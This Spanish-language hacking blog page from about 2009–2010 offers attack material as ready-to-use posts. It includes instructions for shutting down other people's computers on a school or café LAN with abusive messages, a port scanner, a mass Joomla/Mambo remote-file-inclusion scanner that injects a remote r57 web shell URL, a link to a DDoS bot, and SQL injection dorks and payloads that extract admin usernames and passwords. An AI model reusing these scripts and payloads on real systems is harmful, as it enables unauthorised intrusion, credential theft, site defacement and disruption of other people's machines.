_ThePase_

Blogs de Seguridad Informática

Principal

Sobre este blog:



Este es un blog temático dedicado a la Seguridad Informática. Aunque hace las veces de blog personal, la principal función del mismo es exponer contenidos técnicos relacionados con la seguridad.

Blogroll: 13

[x] Agregar a thepase

attackers attackers
ricota ricota
punisher punisher
r0dr1 r0dr1
84kur10 84kur10
darkspark darkspark
pandemic pandemic
murder murder
kfoo kfoo
zer0-z0org zer0-z0org
ragnarok ragnarok

... Ver todos

Perfil de thepase

[x]Nick: thepase
Rango: Newbie
País: do
Visitas: 78533
Votos: 45
En Blogrolls: 26
Status: PM

Patrocinadores:


Anuncia aquí

[x] Apagar todas las computadoras de tu escuela o cafe..

Publicado el 14/05/2010 12:05:00 en Hacking LAN. Total de votos: 3  Votar

Requerimientos::

- La escuela debe estar conectada con una red LAN
- Tiene que ser capaz de crear. Txt y guardarlos en archivos. Bat. (La mayoría de las escuelas no bloquear este)


1ª paso;

- lo que debemos hacer es ir a inicio > ejecutar y escribimos cmd
--------------------------------
Si no te permite entrar al cmd
1) abrir el documento y escriba:
----------------------------------
Código:
shutdown.exe -i
Guarde el archivo txt. Como un bat..

2) Abrir el archivo bat.. "Apagado remoto de diálogo" debería elevarse al abrirlo
----------------------------------
2ª paso;

-luego de escribir cmd presionamos enter y nos aparecera el simbolo del sistema, hay escribimos SHUTDOWN -I

3ª paso..

- despues de escribir shutdown -i presionamos enter y nos saldra la ventana del apagado remoto..



ESE CUADRO ES EL QUE LA LLEVA.

- EN ESE CUADRO SALE LA PESTAÑA "AGREGAR". HAY SE COLOCA EL NOMBRE DEL EQUIPO DE NUESTRA RED QUE QUEREMOS APAGAR.

- MAS ABAJO SALE LA ACCION QUE QUERES QUE HAGA EL EQUIPO REMOTO, ESTA LA OPCION DE:

- APAGAR
- REINICIAR
- SUSPENDER.

ELEGIMOS LA ACCION QUE QUERAMOS.

- DESPUES SALE LA OPCION "MOSTRAR ADVERTENCIA DURANTE". AQUI LE DAMOS EL TIEMPO QUE QUERAMOS PARA QUE EL EQUIPO SE APAGUE O REINICIE ASI DARLE TIEMPO AL WEON QUE GUARDE SUS ARCHIVOS, TAMBIEN PODEMOS HACER EL APAGADO INSTANTANEO.

- MAS ABAJO SALE LA OPCION DE COMENTARIO, DONDE PODEMOS ESCRIBIR LO QUE QUERAMOS. POR EJEMPLO A TU JEFE " CHUPALO PULPO CULIAO " O A LA SECRETARA "ESTAY ENTERA RICA TONTA WEONA" O LA WEA QUE QUERAMOS. SI NO ESCRIBIMOS NINGUN COMENTARIO NO SE EJECUTARA LA ACCION.

LES RECUERDO QUE ES SOLO PARA REDES LAN
--------------------------------------------------------------

hay una opcion en las directivas de seguridad que te permiten activar o desactivar el apagado remoto.. o definir los usuarios que pueden ejecutar tal accion..

inicio--->ejecutar--->gpedit.msc

luego buscan dentro de configuracion del equipo-->config de windows-->config de seguridad-->directivas locales-->asignacion de derechos de usuario. aqui esta un item que dice forzar apagado desde un sistema remoto si le haces 2 click te muestra los usuarios que pueden ejecutar la accion y si deseas agregar mas o asignar ninguno.

saludos


Comentarios: 8 | Leer comentarios

[x] PHP Port Scanner

Publicado el 31/10/2009 12:10:00 en Hacking Web. Total de votos: 0  Votar

$target = "72.14.207.99"; // your target 
$ports = array(21, 25, 79, 80); // http://www.iss.net/security_center/advice/Exploits/Ports/default.htm 
$timeout = 1; // ...timeout 

function portScan($host, $port, $timeout=30) { 
$fp = @fsockopen($host, $port, $errno, $errstr, $timeout); 
if ($fp) { 
return True; 
} else { 
return False; 
} 
} 

ob_start(); 
foreach($ports as $port) { 
$scan=portScan($target, $port, $timeout); 
if($scan[0]) { 
echo "Success $target:$port 
"; 
} else { 
echo "Fail $target:$port 
"; 
} 
ob_flush(); // Used to send data right after instead of waiting for entire scan 
flush(); // See last comment. 
} 
?>


Comentarios: 2 | Leer comentarios

[x] [PHP] Mass Mambo/joomla RFI Scanner

Publicado el 31/10/2009 12:10:00 en Hacking Web. Total de votos: 0  Votar

<?php

/*
PHP Mass Mambo/Joomla RFI Scanner version 1.5 - 26/04/2007
Written by R00T[ATI] && Minus. hvc88[at]hotmail.com
*/

if ($argc<5) {
echo"\nUsage: php mass_scan.php targets.txt output.txt list.txt http://r57_shell.txt\n"; 
die;
}


$targetsi = $argv[1];
$outputi = $argv[2];
$lista = $argv[3];
$shell = $argv[4];
$shell .= "?";

if(!$targets=fopen($targetsi,"r"))
{
echo "Error reading input sites file\n";
exit;
}


if(!$list=fopen($lista,"r"))
{
echo "Error reading rfi file\n";
exit;
}

/* For not replace eventual output files Minus plugged-in this code */
if (file_exists($outputi)) {
$outputi = "$outputi.2"; 
}

if (file_exists("$outputi".".1")) {
$outputi = "$outputi.2"; 
}
/* End of Minus add-on */

if(!$output=fopen($outputi,"w"))
{
echo "Error writing in output file\n";
exit;
}


ini_set('max_execution_time', 999999999);


while(!feof($targets)) /* First cicle of targets list */
{
$target_h = (fgets($targets));
fclose($list);  /* Closing RFI file */
$list=fopen($lista,"r"); /* Reopening RFI and LFI file for restart the pointer at the first line */

    do { /* Opening second cicle for RFI and LFI file */

    $list_h = (fgets($list));
    $site =  trim($target_h).trim($list_h).$shell; /* trim for delete the spaces */
    echo $site; 

    $file = @fopen($site, 'r'); /* Rudimental HTTP replay grabber XD */
        if ($file)
        {
        echo " - 200\n";
      $lines = file($site);
      foreach($lines as $line_num => $line) {
      $content = $line;
      if (preg_match("/r57/",$content)){
      echo "\nFound RFI\n\n";
      fputs($output ,"$site"."\n"); /* Write in output file */
      }
      }
        }
            else /* If site replay with 404 */
            {
            echo " - 404\n"; /* 404??? Maybe also 403 or 500 */
            }
      } while(!feof($list)); /* Closing RFI and LFI file */
    
    $not_regular_200 = false; /* Resetting boolean flag to false */

} /* Closing first cicle of targets list */
fclose($list);
fclose($targets);
fclose($output);
?>


TARGETS.TXT
ej. http://www.wall.com

LIST.TXT
/index.php?option=com_custompages&cpage=
/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=
/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=
/components/com_facileforms/facileforms.frame.php?ff_compath=
/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=
/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=
/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=
/administrator/components/com_ongumatimesheet20/lib/onguma.class.... [/url]
[/trombi]

Continúa aquí...

Comentarios: 2 | Leer comentarios

[x] Ddos Bot v1.9.2

Publicado el 25/10/2009 12:10:00 en Hacking General. Total de votos: 1  Votar




Descarga:
http://www.2shared.com/file/7516773/758e378e/ddos_bot.html

Salu2...

Comentarios: 7 | Leer comentarios

[x] Joomla Defacer

Publicado el 25/10/2009 12:10:00 en Hacking Web. Total de votos: 1  Votar

**************************************************  *****************************
# Title : Joomla Component EventList <= 0.8  (did) Remote Blind SQL Injection Vulnerability
# Author : ajann
# Contact  : 
# S.Page : http://www.schlu.net/
# $$ : Free
# Dork : intext:"Event  List 0.8 Alpha by schlu.net "
# DorkEx : http://www.google.com.tr/search?q=in...r&start=0&sa=N
**************************************************  *****************************
[[SQL]]]---------------------------------------------------------
http://[target]/[path]//index.php?option=com_eventlist&func=details&did=[SQL  Inject]
Example:
//index.php?option=com_eventlist&func=details&did=99 99999999999%20union%20select%200,0,concat(char(117 ,115,101,114,110,97,109,101,58),username,char(32,1 12,97,115,115,119,111,114,100,58),password),4,5,6, 7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20fro m%20jos_users/*
[[/SQL]]
"""""""""""""""""""""
# ajann,Turkey
#  ...
# Im not Hacker!


GOOGLE Dork :
allinurl: "com_musepoes"
Exploit : 
index.php?option=com_musepoes&task=answer&Itemid=s @bun&catid=s@bun&aid=-1/**/union/**/select/**/0,username,password,0x3a,0x3a,3,0,0x3a,0,4,4,4,0,0 x3a,0,5,5,5,0,0x3a/**/from/**/mos_users/*



Joomla Hata Google Dork : 
1) "Powered by eWriting 1.2.1
2) allinurl:"com_ewriting"


Exploit For Joomla : 
index.php?option=com_ewriting&Itemid=9999&func=sel ectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10+FROM+jos_users--


Exploit for Mambo:
index.php?option=com_ewriting&Itemid=9999&func=sel ectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10+FROM+mos_users--


Joomla Cambiar la contraseña del administrador Exploit:
index.php?option=com_user&view=reset&layout=confirm


#####################################################################################
####                     Joomla 1.5.x Remote Admin Password Change               ####
#####################################################################################
#                                                                                   #
# Author: d3m0n (d3m0n@o2.pl)                                                       #
# Greets: GregStar, gorion, d3d!k                                                   #
#                                                                                   #
# Polish "hackers" used this bug to deface turkish sites BUAHAHHA nice 0-day pff    #
#                                                                                   #
#####################################################################################



File : /components/com_user... [/url]
[/trombi]

Continúa aquí...

Comentarios: 3 | Leer comentarios
Ver: Siguientes 5



Powered by Diosdelared.com CMS Blogs
© Diosdelared 2009